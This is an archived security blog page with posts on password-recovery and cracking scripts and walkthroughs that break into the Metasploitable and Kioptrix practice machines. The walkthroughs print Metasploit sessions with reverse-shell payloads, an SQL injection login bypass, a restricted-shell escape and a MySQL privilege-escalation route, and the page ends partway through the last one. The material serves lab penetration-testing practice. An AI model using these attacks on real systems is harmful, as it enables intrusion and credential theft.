The Evil Bit Blog: November 2013

Wednesday, November 27, 2013

Tool - PickAx Password Finder

A PAX file is an encrypted image format, where Blowfish is used as the encryption algorithm. The tool, called Pick Ax, was developed by Smaller Animals, but it's not accessible anymore from the original website (http://www.smalleranimals.com/pickaxe.htm), but you can find it here:

http://windows.softwareweb.com/download-file/100581616/freeware/pick-ax-1.0/

The image header signature is: "PAX" (0x50 0x41 0x58) in the first 3 bytes.

I made a script, which can simply try passwords from a wordlist (or you can specify a single one) against a given image. It requires _ISource50.dll, which contains a function to check for the password, it's downloadable from Smaller Animal's website:

http://www.smalleranimals.com/isource.htm

http://www.smalleranimals.com/zips/ImgSource5/isource50.zip

Using the tool is really simple:

Usage: pickaxpwfinder.py [options]

Options:
-h, --help show this help message and exit
-p PASSWORD, --password=PASSWORD
Password to try
-d DICTIONARY, --dictionary=DICTIONARY
Specify dictionary (wordlist)
-f FILE, --file=FILE Chose PAX file to crack

I also made an encrypted PAX image to play with, the password is "password".

It can be downloaded from my site:
https://sites.google.com/site/csabyblog/home/pickaxpwfinder

Monday, November 25, 2013

Tool: Total Commander FTP Password Recovery

I made a simple Python script, which can recover Total Commander stored FTP passwords.

The usage of the tool is very simple:

Usage: tcpwrecovery.py [options]

Options:
-h, --help show this help message and exit
-c, --common Search wcx_ftp.ini in common places
-f FILE, --file=FILE File to decrypt
-p PASSWORD, --password=PASSWORD
Password to decrypt

It can search in some common places for the INI file, you can explicitly specify the location or you can simply supply the encrypted password. Sample output:

c:\tcpwrecovery>tcpwrecovery.py -c
-> Trying: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini
-> Found: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini
-> Decrypting: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini

[connections]
1=example.com
default=example.com
[example.com]
host=example.com
username=fakeusername
password=fakepassword
pasvmode=0
MLSD=-1
[default]
pasvmode=0

-> Trying: C:\Windows\wcx_ftp.ini
-> Not found: C:\Windows\wcx_ftp.ini

-> Trying: wcx_ftp.ini
-> Not found: wcx_ftp.ini

License: MIT

Downloadable from my site: https://sites.google.com/site/csabyblog/home/tcpwrecovery

Monday, November 11, 2013

Metasploitable 2 - Walkthrough

There is a second, newer release to Metasploitable (2), which is downloadble from here:

http://sourceforge.net/projects/metasploitable/

It has most of the services from the old edition and quite a bunch of new ones.

Here is the NMAP scan:

root@kali:~# nmap -sS -A 192.168.1.23 -p1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-10 08:21 CET
Nmap scan report for 192.168.1.23
Host is up (0.00051s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open telnet      Linux telnetd
25/tcp    open smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after: 2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-10T07:23:51+00:00; -2s from local time.
53/tcp    open domain      ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp    open http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp   open rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto service
|   100000 2            111/tcp rpcbind
|   100000 2            111/udp rpcbind
|   100003 2,3,4       2049/tcp nfs
|   100003 2,3,4       2049/udp nfs
|   100005 1,2,3      37592/tcp mountd
|   100005 1,2,3      38749/udp mountd
|   100021 1,3,4      48184/udp nlockmgr
|   100021 1,3,4      49513/tcp nlockmgr
|   100024 1          41287/tcp status
|_ 100024 1          48160/udp status
139/tcp   open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open exec        netkit-rsh rexecd
513/tcp   open login
514/tcp   open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open shell       Metasploitable root shell
2049/tcp open nfs         2-4 (RPC #100003)
2121/tcp open ftp         ProFTPD 1.3.1
3306/tcp open mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: )%{aRYF2h4j:$B`>RcyY
3632/tcp open distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    Unknown security type (33554432)
6000/tcp open X11         (access denied)
6667/tcp open irc         Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Throttled: Reconnecting too fast) -Email admin@Metasploitable.LAN for more information.
6697/tcp open irc         Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Too many unknown connections from your IP)
8009/tcp open ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
8787/tcp open drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34829/tcp open unknown
37592/tcp open mountd      1-3 (RPC #100005)
41287/tcp open status      1 (RPC #100024)
49513/tcp open nlockmgr    1-4 (RPC #100021)
| rpcinfo:
|   program version   port/proto service
|   100000 2            111/tcp rpcbind
|   100000 2            111/udp rpcbind
|   100003 2,3,4       2049/tcp nfs
|   100003 2,3,4       2049/udp nfs
|   100005 1,2,3      37592/tcp mountd
|   100005 1,2,3      38749/udp mountd
|   100021 1,3,4      48184/udp nlockmgr
|   100021 1,3,4      49513/tcp nlockmgr
|   100024 1          41287/tcp status
|_ 100024 1          48160/udp status
MAC Address: 00:0C:29:A1:61:F8 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_ System time: 2013-11-10T02:23:49-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.1.23

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.43 seconds

Again, as there are way too many options here, and doing it with MSF is easy, I will show two methods, and will the rest to you.

Method 1 - via FTP

After some search we can find that there is an MSF exploit for the VSFTP service installed:

https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

Running it we get root shell immediately, cause most likely the service is running with root privileges.

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting Required Description
   ----   --------------- -------- -----------
   RHOST 192.168.1.23     yes       The target address
   RPORT 21               yes       The target port

Exploit target:

   Id Name
   -- ----
   0   Automatic

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
id
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.17:34683 -> 192.168.1.23:6200) at 2013-11-11 21:24:13 +0100

uid=0(root) gid=0(root)
ls /root
Desktop
reset_logs.sh
vnc.log

Method 2 - distcc + nmap

This time I picked up the following exploit (again, Google search on the service):

https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting Required Description
   ----   --------------- -------- -----------
   RHOST 192.168.1.23     yes       The target address
   RPORT 3632             yes       The target port

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting Required Description
   ----   --------------- -------- -----------
   LHOST 192.168.1.17     yes       The listen address
   LPORT 4444             yes       The listen port

Exploit target:

   Id Name
   -- ----
   0   Automatic Target

msf exploit(distcc_exec) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 2 opened (192.168.1.17:4444 -> 192.168.1.23:60752) at 2013-11-11 21:27:52 +0100

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

You can place the session to background with CTRL + Z. As for privilege escalation I choose this, and it worked:

http://www.rapid7.com/db/modules/exploit/unix/local/setuid_nmap

msf exploit(setuid_nmap) > show options

Module options (exploit/unix/local/setuid_nmap):

   Name         Current Setting Required Description
   ----         --------------- -------- -----------
   ExtraArgs                     no        Extra arguments to pass to Nmap (e.g. --datadir)
   Nmap         /usr/bin/nmap    yes       Path to setuid nmap executable
   SESSION                       yes       The session to run this module on.
   WritableDir /tmp             yes       A directory where we can write files

Exploit target:

   Id Name
   -- ----
   0   Command payload

msf exploit(setuid_nmap) > set SESSION 3
SESSION => 3
msf exploit(setuid_nmap) > exploit

[*] Dropping lua /tmp/ckhDpdXy.nse
[*] Started reverse double handler
id
[*] running
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qDkuWOTbsfd2gBW5;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nqDkuWOTbsfd2gBW5\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.23:43019) at 2013-11-11 21:34:51 +0100

uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
ls /root
Desktop
reset_logs.sh
vnc.log

That's all folks!

Saturday, November 9, 2013

Metasploitable - Walkthrough

Metasploitable is another vulnerable VM designed to practice penetration testing, and especially Metasploit. I could use manual methods like in the previous cases, but I decided to use Metasploit for the exploitation.

I started with NMAP as usual:

root@kali:~# nmap -sS -A 192.168.1.22

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 21:28 CET
Nmap scan report for 192.168.1.22
Host is up (0.0022s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open ftp         ProFTPD 1.3.1
22/tcp   open ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open telnet      Linux telnetd
25/tcp   open smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after: 2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp   open domain      ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp   open http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_ System time: 2013-11-09T15:28:17-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   2.16 ms 192.168.1.22

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

As everything is too easy with Metasploit I will show two methods.

Method 1 - Samba

If we do a Google search for Samba 3.0.20 exploit, we run into the following webpage:

http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

which is exactly the MSF module we need. Configuring and running MSF:

msf exploit(usermap_script) > set RHOST 192.168.1.22
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 192.168.1.17
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting Required Description
   ----   --------------- -------- -----------
   RHOST 192.168.1.22     yes       The target address
   RPORT 139              yes       The target port

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting Required Description
   ----   --------------- -------- -----------
   LHOST 192.168.1.17     yes       The listen address
   LPORT 4444             yes       The listen port

Exploit target:

   Id Name
   -- ----
   0   Automatic

msf exploit(usermap_script) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 1 opened (192.168.1.17:4444 -> 192.168.1.22:59321) at 2013-11-09 21:46:52 +0100

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/#

As Samba was running with root privileges we are done...

Method 2 - via Tomcat Manager + UDEV Netlink local exploit

There is a Tomcat service at port 8180, and if we navigate to it we can find the default links, to the manager, admin page and so on. If we do a quick Google search we can find that the default Tomcat manager username and password are tomcat/tomcat. I tried and it really worked. Now we only need the exploit:

http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy

Here is the related MSF configration:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting Required Description
   ----      --------------- -------- -----------
   PASSWORD tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.22     yes       The target address
   RPORT     8180             yes       The target port
   USERNAME tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting Required Description
   ----   --------------- -------- -----------
   LHOST 192.168.1.17     yes       The listen address
   LPORT 4444             yes       The listen port

Exploit target:

   Id Name
   -- ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.17:4444 -> 192.168.1.22:42541) at 2013-11-09 22:06:25 +0100

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55

As we can see we are not root yet, but a limited tomcat55 account. Let's put meterpreter to the background ('background' command) and look for a local root exploit.

I picked up the following:
http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart     use exploit/linux/local/sock_sendpage   use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec use exploit/linux/local/udev_netlink
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink

msf exploit(udev_netlink) > set SESSION 3
SESSION => 3
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting Required Description
   ----         --------------- -------- -----------
   NetlinkPID                    no        Usually udevd pid-1. Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir /tmp             yes       A directory where we can write files (must not be mounted noexec)

Exploit target:

   Id Name
   -- ----
   0   Linux x86

msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.22:48408) at 2013-11-09 22:14:30 +0100

id
uid=0(root) gid=0(root)

...and we are root.

There are more methods, but I will leave them to you.

Tool - TrueCrypt Search and Decrypt (tcsandd)

I developed this python script / tool for the 2013 DC3 Forensic Challenge. It will search for TC encrypted files in a folder or drive, and then will try to decrypt them.

I used some of the source codes from the following resources:

https://code.google.com/p/tcdiscover/

http://blog.bjrn.se/2008/01/truecrypt-explained.html

http://blog.bjrn.se/2008/02/truecrypt-explained-truecrypt-5-update.html

The codes above were rewritten to support TrueCrypt version 7, keyfile support was added.

The tool is very fast in searching TC volumes. The search logic is the following:

a. The suspect file size modulo 512 must equal zero.

b. The suspect file size is at least 256kB in size (this is the size of the headers + backup headers)

c. The suspect file must not contain a common file header.

d. The suspect file has entropy more then 7.6.

The search is actually looking for encrypted files, as it’s impossible to tell if a file is a TC volume until the correct password is supplied. Thus it can be used to look for other encrypted files like FreeOTFE.

Based on these rules, the search will find any possible encrypted file, not only TC. Proving that a file is actually a TC volume is impossible without decryption. If running it on the entire file system, it will find about 300 files, which are not real TC volumes at all, which is a very good false positive rate, considering that there are more than 200.000 files on a normal computer. (This is only if we have the provided foremost configuration file set, to filter out known headers). An example Foremost header configuration file provided with the source code.

The password tries are very slow compared to other tools like OTFBrutus (http://www.tateu.net/software/dl.php?f=OTFBrutusGUI), and the reason is that the hash and encryptions implemented in python are not so optimal. If we have only a couple of passwords to try, then the tool is good, but if not it will run for long time. The tool can decrypt an entire TC volume (hidden as well) once the password is found.

Available at my site: https://sites.google.com/site/csabyblog/

Tool - extractmd5

I made a small script a while back, which will extract MD5 strings from a given file, and print them out.

It's downloadable from my new site: https://sites.google.com/site/csabyblog/

Friday, November 8, 2013

Kioptrix Level 4 - Walkthrough

OK, so I got to the final level. As always I started with a port scan:

root@kali:~/kioptrix-level4# nmap -sS -A 192.168.1.21

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-07 06:34 CET
Nmap scan report for 192.168.1.21
Host is up (0.00039s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp open ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D5:AC:F6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_ System time: 2013-11-07T01:34:57-05:00
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.1.21

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds

As the host had SMB service, I run another NMAP script to enumerate users:

root@kali:~/kioptrix-level4# nmap -sS -A --script smb-enum-users 192.168.1.21 -p445

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-07 07:04 CET
Nmap scan report for 192.168.1.21
Host is up (0.00035s latency).
PORT    STATE SERVICE     VERSION
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D5:AC:F6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

Host script results:
| smb-enum-users:
|   KIOPTRIX4\john (RID: 3002)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\loneferret (RID: 3000)
|     Full name:   loneferret,,,
|     Flags:       Normal user account
|   KIOPTRIX4\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Normal user account
|   KIOPTRIX4\robert (RID: 3004)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\root (RID: 1000)
|     Full name:   root
|_    Flags:       Normal user account

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.1.21

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.42 seconds

I saved the information (was useful at the next step), and went to the webpage. I really liked the nice little goat picture :)

This time I tried to login as one of the users, so for the user I entered john, and for password:
' OR 1=1 #

and I got to a webpage showing a password.

With this I could get the following passwords:

Username : robert Password : ADGAdsafdfwt4gadfga==
Username : john Password : MyNameIsJohn

loneferret and root gave an error, so those are not exists in the web app, or there is something else with them (later it turned out they do not exists). I used these password to SSH into the system, and I could get in with both of them.

Unfortunately I got only a limited shell, with allowing to execute only a couple of commands. Fortunately we can escape from it with a simple trick: execute "echo os.system('/bin/bash')".

root@kali:~# ssh -l john 192.168.1.21
john@192.168.1.21's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ netstat -antp
*** unknown command: netstat
john:~$ ps -aux
*** unknown command: ps
john:~$ ls
john:~$ pwd
*** unknown command: pwd
john:~$ help
cd clear echo exit help ll lpath ls
john:~$

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$

ps aux showed that the mysql process is running with root privileges:

root 4055 1.7 5.0 128132 26152 ? Sl 01:22 1:53 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var

I really wanted to get in, so I went to the web app, and looked for the mysql password, which was actually empty.

john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

john@Kioptrix4:/var/www$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 133426
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

There is a nice privilege escalation method with this version (and earlier) of the DB, is basically creating a user defined function, which will run with root privileges. The function will execute system commands for us.

More info here:

http://www.exploit-db.com/exploits/1518/

Instead of the exploit we can also use this one:

https://github.com/mysqludf/lib_mysqludf_sys

I downloaded the so file, but had some trouble sending it over, cause I couldn't connect back to my machine with HTTP, TFTP, or FTP. I finally found that SSH is working, so I used SCP to transfer it over. It worked only with executing it from the victim, the other way SCP was blocked.

robert@Kioptrix4:~$ scp root@192.168.1.17:~/kioptrix-level4/lib_mysqludf_sys.so ~/
The authenticity of host '192.168.1.17 (192.168.1.17)' can't be established.
RSA key fingerprint is 53:bd:7e:52:65:39:a3:84:70:31:66:10:73:f5:d6:b6.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.17' (RSA) to the list of known hosts.
root@192.168.1.17's password:
lib_mysqludf_sys.so 100% 13KB 12.6KB/s 00:00
robert@Kioptrix4:~$ ls
lib_mysqludf_sys.so
robert@Kioptrix4:~$

It turned out that this file already exists and loaded, and I shouldn't make this extra work.

mysql> select * from foo2 into dumpfile '/usr/lib/lib_mysqludf_sys.so';

ERROR 1086 (HY000): File '/usr/lib/lib_mysqludf_sys.so' already exists

I had some issues with the function execution, so recreated them:

mysql> DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;